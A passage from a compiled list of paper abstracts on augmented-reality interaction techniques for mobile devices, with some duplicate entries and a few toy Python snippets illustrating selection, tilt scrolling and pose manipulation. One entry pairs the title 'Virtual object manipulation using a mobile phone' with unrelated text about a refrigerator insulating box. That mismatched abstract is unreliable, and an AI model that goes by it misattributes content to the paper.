evaluated our methods in user studies, collecting task performance data and user impressions about this direct way of interacting with augmented scenes through mobile phones. 
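The Balloon Selection abstract above describes decomposing a 3-DOF selection into a 2-DOF Cartesian task for an anchor finger and a 1-DOF task for a second finger. The toy reconstruction below illustrates that decomposition; the specific mapping from inter-finger distance to cursor height is an assumption made for illustration and is not the authors' implementation.

```python
import math

def balloon_selection_point(anchor_xy, second_xy, string_length):
    """Toy 3-DOF cursor from two touch points, Balloon Selection style.

    anchor_xy: (x, y) of the finger anchoring the 'string' on the table; it
               directly sets the cursor's x and y (2-DOF, Cartesian).
    second_xy: (x, y) of the second finger; only its distance to the anchor
               is used (1-DOF, radial).
    string_length: total string length fixed when the gesture starts.

    Assumed mapping: pulling the second finger toward the anchor leaves more
    string for the balloon, so the cursor rises.
    """
    dx = second_xy[0] - anchor_xy[0]
    dy = second_xy[1] - anchor_xy[1]
    pinch_dist = math.hypot(dx, dy)
    height = max(0.0, string_length - pinch_dist)
    return (anchor_xy[0], anchor_xy[1], height)

print(balloon_selection_point((0.10, 0.20), (0.18, 0.20), string_length=0.15))
# -> (0.10, 0.20, 0.07): 8 cm between the fingers leaves 7 cm of 'string' as height
```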
--- paper_title: Touch and hand gesture-based interactions for directly manipulating 3D virtual objects in mobile augmented reality paper_content: Mobile augmented reality (AR) has been widely used in smart and mobile device-based applications such as entertainment, games, visual experience, and information visualization. However, most of the mobile AR applications have limitations in natural user interaction and do not fully support the direct manipulation of 3D AR objects. This paper proposes a new method for naturally and directly manipulating 3D AR objects through touch and hand gesture-based interactions in handheld devices. The touch gesture is used for the AR object selection and the natural hand gesture is used for the direct and interactive manipulation of the selected objects. Thus, the hybrid interaction makes the user more accurately interact with and manipulate AR objects in the real 3D space, not in the 2D space. In particular, natural hand gestures are detected by the Leap Motion sensor attached to the front or back of mobile devices. Thus the user can easily interact with 3D AR objects for 3D transformation to enhance usability and usefulness. In this research, comprehensive comparative analyses were performed among the proposed approach and the widely used screen touch-based approach and vision-based approach in terms of quantitative and qualitative aspects. Quantitative analysis was conducted by measuring task completion time and failure rate to perform given tasks such as 3D object matching and grasp-hang-release operation. Both tasks require simultaneous 3D translation and 3D rotation. In addition, we have compared the gesture performance depending on whether the gesture sensor is located in the front or the back of the mobile device. Furthermore, to support other complex operations, an assembly task has also been evaluated. The assembly task consists of a sequence of combining parts into a sub-assembly. Qualitative analysis was performed through an enquiring questionnaire after the experiment that examines factors such as ease-of-use, ease-of-natural interaction, etc. Both analyses showed that the proposed approach can provide more natural and intuitive interaction and manipulation of mobile AR objects. Several implementation results will also be given to show the advantage and effectiveness of the proposed approach. --- paper_title: Free-hand interaction for handheld augmented reality using an RGB-depth camera paper_content: In this paper, we present a novel gesture-based interaction method for handheld Augmented Reality (AR) implemented on a tablet with an RGB-Depth camera attached. Compared with conventional device-centric interaction methods like keypad, stylus, or touchscreen input, natural gesture-based interfaces offer a more intuitive experience for AR applications. Combining with depth information, gesture interfaces can extend handheld AR interaction into full 3D space. In our system we retrieve the 3D hand skeleton from color and depth frames, mapping the results to corresponding manipulations of virtual objects in the AR scene. Our method allows users to control virtual objects in 3D space using their bare hands and perform operations such as translation, rotation, and zooming. --- paper_title: Mid-air interactions above stereoscopic interactive tables paper_content: Stereoscopic tabletops offer unique visualization capabilities, enabling users to perceive virtual objects as if they were lying above the surface.
While allowing virtual objects to coexist with user actions in the physical world, interaction with these virtual objects above the surface presents interesting challenges. In this paper, we aim to understand which approaches to 3D virtual object manipulations are suited to this scenario. To this end, we implemented five different techniques based on the literature. Four are mid-air techniques, while the remainder relies on multi-touch gestures, which act as a baseline. Our setup combines affordable non-intrusive tracking technologies with a multi-touch stereo tabletop, providing head and hands tracking, to improve both depth perception and seamless interactions above the table. We conducted a user evaluation to find out which technique appealed most to participants. Results suggest that mid-air interactions, combining direct manipulation with six degrees of freedom for the dominant hand, are both more satisfying and efficient than the alternatives tested. --- paper_title: 3D Finger CAPE: Clicking Action and Position Estimation under Self-Occlusions in Egocentric Viewpoint paper_content: In this paper we present a novel framework for simultaneous detection of click action and estimation of occluded fingertip positions from egocentric viewed single-depth image sequences. For the detection and estimation, a novel probabilistic inference based on knowledge priors of clicking motion and clicked position is presented. Based on the detection and estimation results, we were able to achieve a fine resolution level of a bare hand-based interaction with virtual objects in egocentric viewpoint. Our contributions include: (i) a rotation and translation invariant finger clicking action and position estimation using the combination of 2D image-based fingertip detection with 3D hand posture estimation in egocentric viewpoint. (ii) a novel spatio-temporal random forest, which performs the detection and estimation efficiently in a single framework. We also present (iii) a selection process utilizing the proposed clicking action detection and position estimation in an arm reachable AR/VR space, which does not require any additional device. Experimental results show that the proposed method delivers promising performance under frequent self-occlusions in the process of selecting objects in AR/VR space whilst wearing an egocentric-depth camera-attached HMD. --- paper_title: Dynamics of tilt-based browsing on mobile devices paper_content: A tilt-controlled photo browsing method for small mobile devices is presented. The implementation uses continuous inputs from an accelerometer, and a multimodal (visual, audio and vibrotactile) display coupled with the states of this model. The model is based on a simple physical model, with its characteristics shaped to enhance usability. We show how the dynamics of the physical model can be shaped to make the handling qualities of the mobile device fit the browsing task. We implemented the proposed algorithm on Samsung MITs PDA with tri-axis accelerometer and a vibrotactile motor. The experiment used seven novice users browsing from 100 photos. We compare a tilt-based interaction method with a button-based browser and an iPod wheel. We discuss the usability performance and contrast this with subjective experience from the users. The iPod wheel has significantly poorer performance than button pushing or tilt interaction, despite its commercial popularity. 
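The tilt-based browsing abstract above describes shaping a simple physical model so that accelerometer tilt drives photo scrolling. The snippet below is a generic first-order dynamic of that kind, with arbitrary gain and damping constants; it only illustrates the idea of tilt acting as a force on a one-dimensional browsing position and is not the cited paper's actual model.

```python
def simulate_tilt_scroll(tilt_samples, dt=0.02, gain=4.0, damping=2.5):
    """Toy tilt-to-scroll dynamics (illustrative constants, not from the paper).

    tilt_samples: accelerometer tilt angles in radians, one per time step.
    Tilt acts as an acceleration on a 1-D scroll position; viscous damping
    keeps the list from running away when the device stays tilted.
    """
    position, velocity = 0.0, 0.0
    trajectory = []
    for tilt in tilt_samples:
        velocity += (gain * tilt - damping * velocity) * dt
        position += velocity * dt
        trajectory.append(position)
    return trajectory

# Hold the device tilted ~0.2 rad for one second, then level it out.
samples = [0.2] * 50 + [0.0] * 50
print(round(simulate_tilt_scroll(samples)[-1], 3))
```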
--- paper_title: Combining multi-touch input and device movement for 3D manipulations in mobile augmented reality environments paper_content: Nowadays, handheld devices are capable of displaying augmented environments in which virtual content overlaps reality. To interact with these environments it is necessary to use a manipulation technique. The objective of a manipulation technique is to define how the input data modify the properties of the virtual objects. Current devices have multi-touch screens that can serve as input. Additionally, the position and rotation of the device can also be used as input creating both an opportunity and a design challenge. In this paper we compared three manipulation techniques which namely employ multi-touch, device position and a combination of both. A user evaluation on a docking task revealed that combining multi-touch and device movement yields the best task completion time and efficiency. Nevertheless, using only the device movement and orientation is more intuitive and performs worse only in large rotations. --- paper_title: Face to face collaborative AR on mobile phones paper_content: Mobile phones are an ideal platform for augmented reality. In this paper we describe how they also can be used to support face to face collaborative AR applications. We have created a custom port of the ARToolKit library to the Symbian mobile phone operating system and then developed a sample collaborative AR game based on this. We describe the game in detail and user feedback from people who have played it. We also provide general design guidelines that could be useful for others who are developing mobile phone collaborative AR applications. --- paper_title: SlidAR: A 3D positioning method for SLAM-based handheld augmented reality paper_content: Handheld Augmented Reality (HAR) has the potential to introduce Augmented Reality (AR) to large audiences due to the widespread use of suitable handheld devices. However, many of the current HAR systems are not considered very practical and they do not fully answer to the needs of the users. One of the challenging areas in HAR is the in-situ AR content creation where the correct and accurate positioning of virtual objects to the real world is fundamental. Due to the hardware limitations of handheld devices and possible restrictions in the environment, the correct 3D positioning of objects can be difficult to achieve when we are unable to use AR markers or correctly map the 3D structure of the environment. We present SlidAR, a 3D positioning method for Simultaneous Localization And Mapping (SLAM) based HAR systems. SlidAR utilizes 3D ray-casting and epipolar geometry for virtual object positioning. It does not require a perfect 3D reconstruction of the environment nor any virtual depth cues. We have conducted a user experiment to evaluate the efficiency of the SlidAR method against an existing device-centric positioning method that we call HoldAR. Results showed that SlidAR was significantly faster, required significantly less device movement, and also got significantly better subjective evaluation from the test participants. SlidAR also had higher positioning accuracy, although not significantly. --- paper_title: Virtual object manipulation using a mobile phone paper_content: A heat insulating box, such as a refrigerator box, comprises a heat insulator and a box member that is in contact with the heat insulator.
The heat insulator is formed of a urethane foam using either HCFC-123 (CHCl2CF3) or HCFC-141b (CH3CCl2F) or both as a forming agent, and the box member is formed of an acrylonitrile/ethylene-α-olefinic rubbery polymer/styrene resin (A/EPDM/S resin), an acrylonitrile/alkyl acrylate ester rubbery polymer/styrene resin (ASA resin), a mixture of an A/EPDM/S resin and an ASA resin, or a mixture of an ASA resin with an acrylonitrile/butadiene/styrene resin. --- paper_title: A study on improving close and distant device movement pose manipulation for hand-held augmented reality paper_content: Hand-held smart devices are equipped with powerful processing units, high resolution screens and cameras that in combination make them suitable for video see-through Augmented Reality. Many Augmented Reality applications require interaction, such as selection and 3D pose manipulation. One way to perform intuitive, high precision 3D pose manipulation is by direct or indirect mapping of device movement. There are two approaches to device movement interaction; one fixes the virtual object to the device, which therefore becomes the pivot point for the object, thus making it difficult to rotate without translating. The second approach avoids the latter issue by considering rotation and translation separately, relative to the object's center point. The result of this is that the object instead moves out of view for yaw and pitch rotations. In this paper we study these two techniques and compare them with a modification where user perspective rendering is used to solve the rotation issues. The study showed that the modification improves speed as well as both perceived control and intuitiveness among the subjects. --- paper_title: Integrated view-input ar interaction for virtual object manipulation using tablets and smartphones paper_content: Lately, mobile augmented reality (AR) has become very popular and is used for many commercial and product promotional activities. However, in almost all mobile AR applications, the user only views annotated information or the preset motion of the virtual object in an AR environment and is unable to interact with the virtual objects as if he/she were interacting with real objects in the real environment. In this paper, in an attempt to realize enhanced intuitive and realistic object manipulation in the mobile AR environment, we propose an integrated view-input AR interaction method, which integrates user device manipulation and virtual object manipulation. The method enables the user to hold a 3D virtual object by touching the displayed object on the 2D touch screen of a mobile device, and to move and rotate the object by moving and rotating the mobile device while viewing the held object by way of the 2D screen of the mobile device. Based on this concept, we implemented three types of integrated methods, namely the Rod, Center, and Touch methods, and conducted a user study to investigate the baseline performance metrics of the proposed method on an AR object manipulation task. The Rod method achieved the highest success rate (91%). Participants' feedback indicated that this is because the Rod method is the most natural, and evoked a fixed mental model that is conceivable in the real environment. These results indicated that visualizing the manipulation point on the screen and restricting the user's interactivity with virtual objects from the user's position of view based on a conceivable mental model would be able to aid the user to achieve precise manipulation.
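The two device-movement abstracts above contrast coupling the object rigidly to the device (so the device becomes the rotation pivot) with decomposing the device motion into a rotation about the object's own centre plus a separate translation. The sketch below illustrates that distinction with 4x4 homogeneous poses; the function names and demo values are invented for illustration and do not come from the cited papers.

```python
import numpy as np

def make_pose(R, t):
    """Build a 4x4 homogeneous pose from a 3x3 rotation and a translation."""
    T = np.eye(4)
    T[:3, :3], T[:3, 3] = R, t
    return T

def rot_z(a):
    c, s = np.cos(a), np.sin(a)
    return np.array([[c, -s, 0.0], [s, c, 0.0], [0.0, 0.0, 1.0]])

def device_anchored(obj_pose, device_delta):
    """Object rigidly attached to the device: the full device motion is
    composed in front, so device rotations also swing the object around."""
    return device_delta @ obj_pose

def object_centered(obj_pose, device_delta):
    """Rotation and translation handled separately relative to the object's
    own centre: the object turns in place and only shifts by the device's
    translational component."""
    out = obj_pose.copy()
    out[:3, :3] = device_delta[:3, :3] @ obj_pose[:3, :3]
    out[:3, 3] = obj_pose[:3, 3] + device_delta[:3, 3]
    return out

obj = make_pose(np.eye(3), np.array([0.0, 0.3, 0.0]))   # object 30 cm ahead
delta = make_pose(rot_z(np.pi / 2), np.zeros(3))         # device yawed 90 degrees
print(device_anchored(obj, delta)[:3, 3])  # object swings to roughly [-0.3, 0, 0]
print(object_centered(obj, delta)[:3, 3])  # object stays at [0, 0.3, 0]
```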
--- paper_title: Mobile phone based AR scene assembly paper_content: In this paper we describe a mobile phone based Augmented Reality application for 3D scene assembly. Augmented Reality on mobile phones extends the interaction capabilities on such handheld devices. It adds a 6 DOF isomorphic interaction technique for manipulating 3D content. We give details of an application that we believe to be the first where 3D content can be manipulated using both the movement of a camera tracked mobile phone and a traditional button interface as input for transformations. By centering the scene in a tangible marker space in front of the phone we provide a mean for bimanual interaction. We describe the implementation, the interaction techniques we have developed and initial user response to trying the application. --- paper_title: An empirical evaluation of virtual hand techniques for 3D object manipulation in a tangible augmented reality environment paper_content: In this paper, we present a Fitts' law-based formal evaluation process and the corresponding results for 3D object manipulation techniques based on a virtual hand metaphor in a tangible augmented reality (TAR) environment. Specifically, we extend the design parameters of the 1D scale Fitts' law to 3D scale and then refine an evaluation model in order to bring generality and ease of adaptation to various TAR applications. Next, we implement and compare standard TAR manipulation techniques using a cup, a paddle, a cube, and a proposed extended paddle prop. Most manipulation techniques were well-modeled in terms of linear regression according to Fitts' law, with a correlation coefficient value of over 0.9. Notably, the throughput by ISO 9241-9 of the extended paddle technique peaked at around 1.39 to 2 times higher than in the other techniques, due to the instant 3D positioning of the 3D objects. In the discussion, we subsequently examine the characteristics of the TAR manipulation techniques in terms of stability, speed, comfort, and understanding. As a result, our evaluation process, results, and analysis can be useful in guiding the design and implementation of future TAR interfaces. --- paper_title: Gesture-based interaction via finger tracking for mobile augmented reality paper_content: The goal of this research is to explore new interaction metaphors for augmented reality on mobile phones, i.e. applications where users look at the live image of the device’s video camera and 3D virtual objects enrich the scene that they see. Common interaction concepts for such applications are often limited to pure 2D pointing and clicking on the device’s touch screen. Such an interaction with virtual objects is not only restrictive but also difficult, for example, due to the small form factor. In this article, we investigate the potential of finger tracking for gesture-based interaction. We present two experiments evaluating canonical operations such as translation, rotation, and scaling of virtual objects with respect to performance (time and accuracy) and engagement (subjective user feedback). Our results indicate a high entertainment value, but low accuracy if objects are manipulated in midair, suggesting great possibilities for leisure applications but limited usage for serious tasks. --- paper_title: Combining multi-touch input and device movement for 3D manipulations in mobile augmented reality environments paper_content: Nowadays, handheld devices are capable of displaying augmented environments in which virtual content overlaps reality. 
To interact with these environments it is necessary to use a manipulation technique. The objective of a manipulation technique is to define how the input data modify the properties of the virtual objects. Current devices have multi-touch screens that can serve as input. Additionally, the position and rotation of the device can also be used as input creating both an opportunity and a design challenge. In this paper we compared three manipulation techniques which namely employ multi-touch, device position and a combination of both. A user evaluation on a docking task revealed that combining multi-touch and device movement yields the best task completion time and efficiency. Nevertheless, using only the device movement and orientation is more intuitive and performs worse only in large rotations. --- paper_title: A REVIEW OF 3D GESTURE INTERACTION FOR HANDHELD AUGMENTED REALITY paper_content: Interaction for Handheld Augmented Reality (HAR) is a challenging research topic because of the small screen display and limited input options. Although 2D touch screen input is widely used, 3D gesture interaction is a suggested alternative input method. Recent 3D gesture interaction research mainly focuses on using RGB-Depth cameras to detect the spatial position and pose of fingers, using this data for virtual object manipulations in the AR scene. In this paper we review previous 3D gesture research on handheld interaction metaphors for HAR. We present their novelties as well as limitations, and discuss future research directions of 3D gesture interaction for HAR. Our results indicate that 3D gesture input on HAR is a potential interaction method for assisting a user in many tasks such as in education, urban simulation and 3D games. --- paper_title: Shift: a technique for operating pen-based interfaces using touch paper_content: Retrieving the stylus of a pen-based device takes time and requires a second hand. Especially for short intermittent interactions many users therefore choose to use their bare fingers. Although convenient, this increases targeting times and error rates. We argue that the main reasons are the occlusion of the target by the user's finger and ambiguity about which part of the finger defines the selection point. We propose a pointing technique we call Shift that is designed to address these issues. When the user touches the screen, Shift creates a callout showing a copy of the occluded screen area and places it in a non-occluded location. The callout also shows a pointer representing the selection point of the finger. Using this visual feedback, users guide the pointer into the target by moving their finger on the screen surface and commit the target acquisition by lifting the finger. Unlike existing techniques, Shift is only invoked when necessary--over large targets no callout is created and users enjoy the full performance of an unaltered touch screen. We report the results of a user study showing that with Shift participants can select small targets with much lower error rates than an unaided touch screen and that Shift is faster than Offset Cursor for larger targets. --- paper_title: The fat thumb: using the thumb's contact size for single-handed mobile interaction paper_content: Modern mobile devices allow a rich set of multi-finger interactions that combine modes into a single fluid act, for example, one finger for panning blending into a two-finger pinch gesture for zooming. Such gestures require the use of both hands: one holding the device while the other is interacting. 
While on the go, however, only one hand may be available to both hold the device and interact with it. This mostly limits interaction to a single-touch (i.e., the thumb), forcing users to switch between input modes explicitly. In this paper, we contribute the Fat Thumb interaction technique, which uses the thumb's contact size as a form of simulated pressure. This adds a degree of freedom, which can be used, for example, to integrate panning and zooming into a single interaction. Contact size determines the mode (i.e., panning with a small size, zooming with a large one), while thumb movement performs the selected mode. We discuss nuances of the Fat Thumb based on the thumb's limited operational range and motor skills when that hand holds the device. We compared Fat Thumb to three alternative techniques, where people had to precisely pan and zoom to a predefined region on a map and found that the Fat Thumb technique compared well to existing techniques. --- paper_title: Art of defense: a collaborative handheld augmented reality board game paper_content: In this paper, we present Art of Defense (AoD), a cooperative handheld augmented reality (AR) game. AoD is an example of what we call an AR Board Game, a class of tabletop games that combine handheld computers (such as camera phones) with physical game pieces to create a merged physical/virtual game on the table-top. This paper discusses the technical aspects of the game, the design rationale and process we followed, and the resulting player experience. The goal of this research is to explore the affordances and constraints of handheld AR interfaces for collaborative social games, and to create a game that leverages them as fully as possible. The results from the user study show that the game is fun to play, and that by tightly registering the virtual content with the tangible game pieces, tabletop AR games enable a kind of social play experience unlike non-AR computer games. We hope this research will inspire the creation of other handheld augmented reality games in the future, both on and off the tabletop. --- paper_title: 3D gesture interaction for handheld augmented reality paper_content: In this paper, we present a prototype for exploring natural gesture interaction with Handheld Augmented Reality (HAR) applications, using visual tracking based AR and freehand gesture based interaction detected by a depth camera. We evaluated this prototype in a user study comparing 3D gesture input methods with traditional touch-based techniques, using canonical manipulation tasks that are common in AR scenarios. We collected task performance data and user feedback via a usability questionnaire. The 3D gesture input methods were found to be slower, but the majority of the participants preferred them and gave them higher usability ratings. Being intuitive and natural was the most common feedback about the 3D freehand interface. We discuss implications of this research and directions for further work. --- paper_title: SlidAR: A 3D positioning method for SLAM-based handheld augmented reality paper_content: Abstract Handheld Augmented Reality (HAR) has the potential to introduce Augmented Reality (AR) to large audiences due to the widespread use of suitable handheld devices. However, many of the current HAR systems are not considered very practical and they do not fully answer to the needs of the users. 
One of the challenging areas in HAR is the in-situ AR content creation where the correct and accurate positioning of virtual objects to the real world is fundamental. Due to the hardware limitations of handheld devices and possible restrictions in the environment, the correct 3D positioning of objects can be difficult to achieve when we are unable to use AR markers or correctly map the 3D structure of the environment. We present SlidAR, a 3D positioning method for Simultaneous Localization And Mapping (SLAM) based HAR systems. SlidAR utilizes 3D ray-casting and epipolar geometry for virtual object positioning. It does not require a perfect 3D reconstruction of the environment nor any virtual depth cues. We have conducted a user experiment to evaluate the efficiency of the SlidAR method against an existing device-centric positioning method that we call HoldAR. Results showed that SlidAR was significantly faster, required significantly less device movement, and also got significantly better subjective evaluation from the test participants. SlidAR also had higher positioning accuracy, although not significantly. --- paper_title: A study on improving close and distant device movement pose manipulation for hand-held augmented reality paper_content: Hand-held smart devices are equipped with powerful processing units, high resolution screens and cameras that in combination make them suitable for video see-through Augmented Reality. Many Augmented Reality applications require interaction, such as selection and 3D pose manipulation. One way to perform intuitive, high precision 3D pose manipulation is by direct or indirect mapping of device movement. There are two approaches to device movement interaction; one fixes the virtual object to the device, which therefore becomes the pivot point for the object, thus making it difficult to rotate without translating. The second approach avoids the latter issue by considering rotation and translation separately, relative to the object's center point. The result of this is that the object instead moves out of view for yaw and pitch rotations. In this paper we study these two techniques and compare them with a modification where user perspective rendering is used to solve the rotation issues. The study showed that the modification improves speed as well as both perceived control and intuitiveness among the subjects. --- paper_title: Balloon Selection: A Multi-Finger Technique for Accurate Low-Fatigue 3D Selection paper_content: Balloon selection is a 3D interaction technique that is modeled after the real world metaphor of manipulating a helium balloon attached to a string. Balloon selection allows for precise 3D selection in the volume above a tabletop surface by using multiple fingers on a multi-touch-sensitive surface. The 3DOF selection task is decomposed in part into a 2DOF positioning task performed by one finger on the tabletop in an absolute 2D Cartesian coordinate system and a 1DOF positioning task performed by another finger on the tabletop in a relative 2D polar coordinate system. We have evaluated balloon selection in a formal user study that compared it to two well-known interaction techniques for selecting a static 3D target: a 3DOF tracked wand and keyboard cursor keys. We found that balloon selection was significantly faster than using cursor keys and had a significantly lower error rate than the wand.
The lower error rate appeared to result from the user's hands being supported by the tabletop surface, resulting in significantly reduced hand tremor and arm fatigue. --- paper_title: The Continuous Interaction Space: Interaction Techniques Unifying Touch and Gesture On and Above a Digital Surface paper_content: The rising popularity of digital table surfaces has spawned considerable interest in new interaction techniques. Most interactions fall into one of two modalities: 1) direct touch and multi-touch (by hand and by tangibles) directly on the surface, and 2) hand gestures above the surface. The limitation is that these two modalities ignore the rich interaction space between them. To move beyond this limitation, we first contribute a unification of these discrete interaction modalities called the continuous interaction space. The idea is that many interaction techniques can be developed that go beyond these two modalities, where they can leverage the space between them. That is, we believe that the underlying system should treat the space on and above the surface as a continuum, where a person can use touch, gestures, and tangibles anywhere in the space and naturally move between them. Our second contribution illustrates this, where we introduce a variety of interaction categories that exploit the space between these modalities. For example, with our Extended Continuous Gestures category, a person can start an interaction with a direct touch and drag, then naturally lift off the surface and continue their drag with a hand gesture over the surface. For each interaction category, we implement an example (or use prior work) that illustrates how that technique can be applied. In summary, our primary contribution is to broaden the design space of interaction techniques for digital surfaces, where we populate the continuous interaction space both with concepts and examples that emerge from considering this space as a continuum. --- paper_title: Real-time hand interaction for augmented reality on mobile phones paper_content: Over the past few years, Augmented Reality has become widely popular in the form of smart phone applications, however most smart phone-based AR applications are limited in user interaction and do not support gesture-based direct manipulation of the augmented scene. In this paper, we introduce a new AR interaction methodology, employing users' hands and fingers to interact with the virtual (and possibly physical) objects that appear on the mobile phone screen. The goal of this project was to support different types of interaction (selection, transformation, and fine-grain control of an input value) while keeping the methodology for hand detection as simple as possible to maintain good performance on smart phones. We evaluated our methods in user studies, collecting task performance data and user impressions about this direct way of interacting with augmented scenes through mobile phones. --- paper_title: Touch and hand gesture-based interactions for directly manipulating 3D virtual objects in mobile augmented reality paper_content: Mobile augmented reality (AR) has been widely used in smart and mobile device-based applications such as entertainment, games, visual experience, and information visualization. However, most of the mobile AR applications have limitations in natural user interaction and do not fully support the direct manipulation of 3D AR objects. 
This paper proposes a new method for naturally and directly manipulating 3D AR objects through touch and hand gesture-based interactions in handheld devices. The touch gesture is used for the AR object selection and the natural hand gesture is used for the direct and interactive manipulation of the selected objects. Thus, the hybrid interaction makes the user more accurately interact with and manipulate AR objects in the real 3D space, not in the 2D space. In particular, natural hand gestures are detected by the Leap Motion sensor attached to the front or back of mobile devices. Thus the user can easily interact with 3D AR objects for 3D transformation to enhance usability and usefulness. In this research, comprehensive comparative analyses were performed among the proposed approach and the widely used screen touch-based approach and vision-based approach in terms of quantitative and qualitative aspects. Quantitative analysis was conducted by measuring task completion time and failure rate to perform given tasks such as 3D object matching and grasp-hang-release operation. Both tasks require simultaneous 3D translation and 3D rotation. In addition, we have compared the gesture performance depending on whether the gesture sensor is located in the front or the back of the mobile device. Furthermore, to support other complex operations, an assembly task has also been evaluated. The assembly task consists of a sequence of combining parts into a sub-assembly. Qualitative analysis was performed through an enquiring questionnaire after the experiment that examines factors such as ease-of-use, ease-of-natural interaction, etc. Both analyses showed that the proposed approach can provide more natural and intuitive interaction and manipulation of mobile AR objects. Several implementation results will also be given to show the advantage and effectiveness of the proposed approach. --- paper_title: Back-of-device interaction allows creating very small touch devices paper_content: In this paper, we explore how to add pointing input capabilities to very small screen devices. On first sight, touchscreens seem to allow for particular compactness, because they integrate input and screen into the same physical space. The opposite is true, however, because the user's fingers occlude contents and prevent precision. We argue that the key to touch-enabling very small devices is to use touch on the device backside. In order to study this, we have created a 2.4" prototype device; we simulate screens smaller than that by masking the screen. We present a user study in which participants completed a pointing task successfully across display sizes when using a back-of-device interface. The touchscreen-based control condition (enhanced with the Shift technique), in contrast, failed for screen diagonals below 1 inch. We present four form factor concepts based on back-of-device interaction and provide design guidelines extracted from a second user study. --- paper_title: Free-hand interaction for handheld augmented reality using an RGB-depth camera paper_content: In this paper, we present a novel gesture-based interaction method for handheld Augmented Reality (AR) implemented on a tablet with an RGB-Depth camera attached. Compared with conventional device-centric interaction methods like keypad, stylus, or touchscreen input, natural gesture-based interfaces offer a more intuitive experience for AR applications. Combining with depth information, gesture interfaces can extend handheld AR interaction into full 3D space.
In our system we retrieve the 3D hand skeleton from color and depth frames, mapping the results to corresponding manipulations of virtual objects in the AR scene. Our method allows users to control virtual objects in 3D space using their bare hands and perform operations such as translation, rotation, and zooming. --- paper_title: Smartphone as an augmented reality authoring tool via multi-touch based 3D interaction method paper_content: In this paper we present an Augmented Reality (AR) authoring tool for smartphones which facilitates intuitive interactions that manipulate the augmented virtual objects in real-time. A novel 3D interaction method using multi-touch interface and camera pose is proposed for intuitive authoring. With the gestures of two fingers on the touch screen, the user can adjust 3 DOF translation and 3 DOF rotation to a selected virtual object. The capabilities of the authoring tool are demonstrated on a smartphone. --- paper_title: Integrated view-input ar interaction for virtual object manipulation using tablets and smartphones paper_content: Lately, mobile augmented reality (AR) has become very popular and is used for many commercial and product promotional activities. However, in almost all mobile AR applications, the user only views annotated information or the preset motion of the virtual object in an AR environment and is unable to interact with the virtual objects as if he/she were interacting with real objects in the real environment. In this paper, in an attempt to realize enhanced intuitive and realistic object manipulation in the mobile AR environment, we propose an integrated view-input AR interaction method, which integrates user device manipulation and virtual object manipulation. The method enables the user to hold a 3D virtual object by touching the displayed object on the 2D touch screen of a mobile device, and to move and rotate the object by moving and rotating the mobile device while viewing the held object by way of the 2D screen of the mobile device. Based on this concept, we implemented three types of integrated methods, namely the Rod, Center, and Touch methods, and conducted a user study to investigate the baseline performance metrics of the proposed method on an AR object manipulation task. The Rod method achieved the highest success rate (91%). Participants' feedback indicated that this is because the Rod method is the most natural, and evoked a fixed mental model that is conceivable in the real environment. These results indicated that visualizing the manipulation point on the screen and restricting the user's interactivity with virtual objects from the user's position of view based on a conceivable mental model would be able to aid the user to achieve precise manipulation. --- paper_title: The design and evaluation of 3D positioning techniques for multi-touch displays paper_content: Multi-touch displays represent a promising technology for the display and manipulation of 3D data. To fully exploit their capabilities, appropriate interaction techniques must be designed. In this paper, we explore the design of free 3D positioning techniques for multi-touch displays to exploit the additional degrees of freedom provided by this technology. Our contribution is two-fold: first we present an interaction technique to extend the standard four view-ports technique found in commercial CAD applications, and second we introduce a technique designed to allow free 3D positioning with a single view of the scene. 
The two techniques were evaluated in a preliminary experiment. The first results incline us to conclude that the two techniques are equivalent in terms of performance, showing that the Z-technique provides a real alternative to the status quo viewport technique. --- paper_title: A screen-space formulation for 2D and 3D direct manipulation paper_content: Rotate-Scale-Translate (RST) interactions have become the de facto standard when interacting with two-dimensional (2D) contexts in single-touch and multi-touch environments. Because the use of RST has thus far focused almost entirely on 2D, there are not yet standard techniques for extending these principles into three dimensions. In this paper we describe a screen-space method which fully captures the semantics of the traditional 2D RST multi-touch interaction, but also allows us to extend these same principles into three-dimensional (3D) interaction. Just like RST allows users to directly manipulate 2D contexts with two or more points, our method allows the user to directly manipulate 3D objects with three or more points. We show some novel interactions, which take perspective into account and are thus not available in orthographic environments. Furthermore, we identify key ambiguities and unexpected behaviors that arise when performing direct manipulation in 3D and offer solutions to mitigate the difficulties each presents. Finally, we show how to extend our method to meet application-specific control objectives, as well as show our method working in some example environments. --- paper_title: Consumed endurance: a metric to quantify arm fatigue of mid-air interactions paper_content: Mid-air interactions are prone to fatigue and lead to a feeling of heaviness in the upper limbs, a condition casually termed as the gorilla-arm effect. Designers have often associated limitations of their mid-air interactions with arm fatigue, but do not possess a quantitative method to assess and therefore mitigate it. In this paper we propose a novel metric, Consumed Endurance (CE), derived from the biomechanical structure of the upper arm and aimed at characterizing the gorilla-arm effect. We present a method to capture CE in a non-intrusive manner using an off-the-shelf camera-based skeleton tracking system, and demonstrate that CE correlates strongly with the Borg CR10 scale of perceived exertion. We show how designers can use CE as a complementary metric for evaluating existing and designing novel mid-air interactions, including tasks with repetitive input such as mid-air text-entry. Finally, we propose a series of guidelines for the design of fatigue-efficient mid-air interfaces. --- paper_title: Freeze view touch and finger gesture based interaction methods for handheld augmented reality interfaces paper_content: Interaction techniques for handheld mobile Augmented Reality (AR) often focus on device-centric methods based around touch input. However, users may not be able to easily interact with virtual objects in mobile AR scenes if they are holding the handheld device with one hand and touching the screen with the other, while at the same time trying to maintain visual tracking of an AR marker. In this paper we explore novel interaction methods for handheld mobile AR that overcome this problem. We investigate two different approaches; (1) freeze view touch and (2) finger gesture based interaction.
We describe how each method is implemented and present findings from a user experiment comparing virtual object manipulation with these techniques to more traditional touch methods. --- paper_title: 3D Finger CAPE: Clicking Action and Position Estimation under Self-Occlusions in Egocentric Viewpoint paper_content: In this paper we present a novel framework for simultaneous detection of click action and estimation of occluded fingertip positions from egocentric viewed single-depth image sequences. For the detection and estimation, a novel probabilistic inference based on knowledge priors of clicking motion and clicked position is presented. Based on the detection and estimation results, we were able to achieve a fine resolution level of a bare hand-based interaction with virtual objects in egocentric viewpoint. Our contributions include: (i) a rotation and translation invariant finger clicking action and position estimation using the combination of 2D image-based fingertip detection with 3D hand posture estimation in egocentric viewpoint. (ii) a novel spatio-temporal random forest, which performs the detection and estimation efficiently in a single framework. We also present (iii) a selection process utilizing the proposed clicking action detection and position estimation in an arm reachable AR/VR space, which does not require any additional device. Experimental results show that the proposed method delivers promising performance under frequent self-occlusions in the process of selecting objects in AR/VR space whilst wearing an egocentric-depth camera-attached HMD. --- paper_title: Mobile Augmented Reality Survey: From Where We Are to Where We Go paper_content: The boom in the capabilities and features of mobile devices, like smartphones, tablets, and wearables, combined with the ubiquitous and affordable Internet access and the advances in the areas 